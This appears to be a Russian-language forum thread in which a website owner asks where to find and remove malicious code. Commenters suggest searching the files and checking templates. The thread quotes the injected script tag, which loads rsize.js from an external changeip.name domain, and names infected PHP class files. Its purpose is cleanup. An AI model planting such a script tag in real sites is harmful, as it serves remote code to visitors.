На сайте заметил вредоносный код, но не знаю, в каком файле удалять...
На сайте есть вредоносный код, но не знаю, в каком файле удалять…
Служба поддержки Касперского (по моему запросу, т.к. сам найти не смог) прислала сообщение, что у меня вредоносный код:
Если загрузить сайт newsstreet.ru в мозилле и нажать ctrl+U, то он виден в самом низу страницы. Но я не знаю, где на сервере ковырять, какой файл и в какой папке, чтобы его удалить.
Вообще код стоит сразу после тега </боди>, а именно после него идёт
</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт > — это конец страницы.
Подскажите, пожалуйста, где ковырять…
Заранее благодарю!
Служба поддержки Касперского (по моему запросу, т.к. сам найти не смог) прислала сообщение, что у меня вредоносный код:
Следующий код является вредоносным:
</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт >
Если загрузить сайт newsstreet.ru в мозилле и нажать ctrl+U, то он виден в самом низу страницы. Но я не знаю, где на сервере ковырять, какой файл и в какой папке, чтобы его удалить.
Вообще код стоит сразу после тега </боди>, а именно после него идёт
</хтмл><скрипт src=«newdomme.changeip.name/rsize.js»></скрипт > — это конец страницы.
Подскажите, пожалуйста, где ковырять…
Заранее благодарю!
31 комментарий
Да вообще не вижу проблемы, пройтись тотал коммандером по alt+F7
footer.tpl просмотреть и папку хуков движка + вспомнить кто имел доступ к серверу.
Я сделал также следующее — скачал весь сайт на комп и прогнал поиском в тотал коммандере с помощью alt+F7 — искал файлы с текстом кода или его частями — ничего нет…
Написал письмо хостеру — жду ответа… может это только он может код удалить…
Я вот сейчас понял, что тотал коммандер не может априори все найти, поскольку у файлов разные расширения, многие он просто не может прочитать видимо, так что нужен какой-то другой поиск…
с тектом: введите часть искомого кода, в котором нет пробелов. например, «newdomme.changeip.name/rsize.js»
но не знаю, как выполнить консольную команду…
Скопировал код из дистрибутива в эти файлы на сервере — вредоносный код исчез.
Остались в директории /private/02_06_2011/classes/actions файлы с тем же названием, они содержат код «base64_decode», но, поскольку в дистрибутиве этих файлов нет, то не знаю, на что менять.
Они случаем не должны быть идентичны тем, что в директории /httpdocs/classes/actions?
вот и там этого и не должно быть. сохранили бы файлы для публичного анализа…
можете их опубликовать в архиве дабы посмотреть что там такое и удалить с сервера.
Заражённые (или один из них) ActionBlog.class.php и ActionProfile.class.php из директории /httpdocs/classes/actions
Заражённые? ActionBlog.class.php и ActionProfile.class.php из директории /private/02_06_2011/classes/actions
но не знаю, как выполнить консольную команду…
Данный способ доступен только при наличии ssh доступа для вашего тарифного плана виртуального хостинга.